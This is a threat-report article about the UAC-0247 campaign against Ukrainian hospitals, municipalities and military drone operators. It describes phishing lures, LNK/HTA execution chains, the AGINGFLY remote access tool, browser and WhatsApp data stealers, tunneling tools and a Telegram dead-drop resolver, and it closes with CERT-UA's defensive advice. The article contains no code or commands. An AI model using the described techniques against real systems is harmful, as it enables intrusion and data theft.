A hacker group named UAC-0247 carried out a major cyber attack on Ukrainian hospitals and local governments. AGINGFLY malware WhatsApp data theft and browser passwords. Learn the whole story in this article.
How the Threat First Emerged
A new and very dangerous cyber attack has been detected in Ukraine. In this attack an unknown threat group, named UAC-0247 by researchers, targeted local governments, clinical hospitals and emergency ambulance services in Ukraine starting in October 2025 and continuing through March and April 2026.
This attack was not just a one off incident but an organized and deliberate campaign that targeted different cities and healthcare institutions simultaneously. It has not yet been confirmed to be linked to any particular country or hacker group, but the techniques and tools used are quite advanced. Ukraine government cyber response team and CERT-UA has documented the case and alerted the world that the trend is ongoing.
How the Campaign Was Launched
The campaign began with a simple email that appeared genuine and professional. The attacker posed as a humanitarian aid organization, promising humanitarian aid and assistance in war zones. Such messages are easy to gain trust and especially when a country is at war.
The email contained a link, prompting a click. When the victim clicked, it would open either a fake website created using AI tools that appeared genuine or a real website that had already been compromised by a Cross-Site Scripting vulnerability. The objective in both cases was the same to download an archive file to the victims computer.
Malicious Archive Execution and Initial Compromise Phase
As soon as the victim opened the downloaded archive file, the real game began. Inside the archive was a shortcut file which has a .LNK extension in Windows. Running this shortcut file activated the built-in HTA tool of Windows which downloaded another file HTA file from a remote server and ran it.
During this entire process a fake form also appeared on the screen once which distracted the user while the malware was being installed. A scheduled task was created which automatically ran the malware. This technique is called Living off the Land in which hackers use Windows own tools so that the antivirus does not suspect.
AGINGFLY RAT : Browser and WhatsApp Data Theft
The real weapon of this campaign was a malware named AGINGFLY written in C# programming language. It was a complete remote access tool through which the attacker could gain complete control over the infected computer. Through AGINGFLY it was possible to give commands, download files, take screenshots activate a keylogger that is the record every key press and run code directly into the memory.
But a special and unusual thing about this malware was that its command handlers i.e. the code that tells what to do, were not built-in within the malware. These handlers came in the form of source code from the C2 server i.e. command-and-control server and were compiled in real-time within the infected system. The advantage of this was that the initial size of the malware remained small, capabilities increased on demand and it was easier to avoid the eyes of security tools.
The attackers used two different tools for data theft. The first was CHROMELEVATOR an open-source tool that decrypts and extracts cookies and saved passwords from Chromium-based browsers like Google Chrome, Microsoft Edge, and Brave without an administrator password.
The second tool was ZAPIXDESK which decrypts the local databases of the WhatsApp application and extracts sensitive data from them. Meaning, if your WhatsApp is installed on Windows and the attacker gains access, then your messages, contacts and other data are all at risk. These two tools together completed a very comprehensive data theft operation.
Lateral Movement and Hidden Tunnels
Once inside, the attackers didn’t stop there. They tried to strengthen their grip even deeper within the network. For this purpose, RustScan, a publicly available port scanner, was used to identify which other computers were on the network. To go further, tunneling tools like LIGOLO-NG and Chisel which create hidden network tunnels, were deployed.
And in one incident, the attackers even installed the XMRIG cryptocurrency miner which was hidden within the WireGuard program. This shows that the attackers aim was not just to steal data but also to make money.
A PowerShell script named SILENTLOOP was used to keep the malware inside and running. This script automatically executed commands, updated its configuration and most interestingly fetched the latest IP address of its C2 server from a Telegram channel.
SILENTLOOP also had backup mechanisms in case the primary source of Telegram failed. This technique is called dead drop resolver and it becomes difficult to block the communication channel directly as Telegram is a legitimate platform. A TCP reverse shell named RAVENSHELL was also used for initial access which provided a direct CMD connection to the attackers.
Defense Sector Under Attack
This attack was not limited to hospitals only. CERT-UA confirmed that personnel of the Ukrainian Defense Forces were also targeted. In one specifically documented incident, on March 10, 2026, a fake update of the BACHU software was sent via Signal messenger.
BACHU is the name of a software tool used by Ukrainian FPV drone operators. The attackers sent a trojanized version of this tool packaged in a file named bacha.zip. As soon as someone downloaded and ran the tool and AGINGFLY was installed through a DLL side-loading technique. This shows that the attackers designed a different and targeted lure for military targets.
How to Defend Against This Threat
CERT-UA has provided organizations with some important steps to protect themselves from such attacks. The first and most important recommendation is to restrict the execution of .LNK, .HTA, and .JS file extensions on endpoint systems.
In many organizations these files run automatically, which poses a risk. Secondly limit the use of Windows built-in tools, such as mshta.exe, powershell.exe and wscript.exe as these tools were exploited in this campaign. These restrictions don’t require any third-party tools they all happen within Windows own settings. Links received via email, especially those with a humanitarian or official appearance should always be verified before clicking on them.
Conclusion
The UAC-0247 campaign is an important reminder that cyber threats don’t just target corporations or banks; hospitals, emergency services, and organizations operating in conflict-prone areas are also frequently targeted. These organizations are already under pressure, have busy staff, and lack security training, making these campaigns more successful there.
The AGINGFLY malwares dynamic compilation technique, the use of Telegram as a C2 and the combination of multiple tools indicate that the attackers are highly experienced and well-resourced. Timely disclosure and technical analysis by CERT-UA is proof that the cybersecurity community is taking such threats seriously and is not delaying in informing defenders.
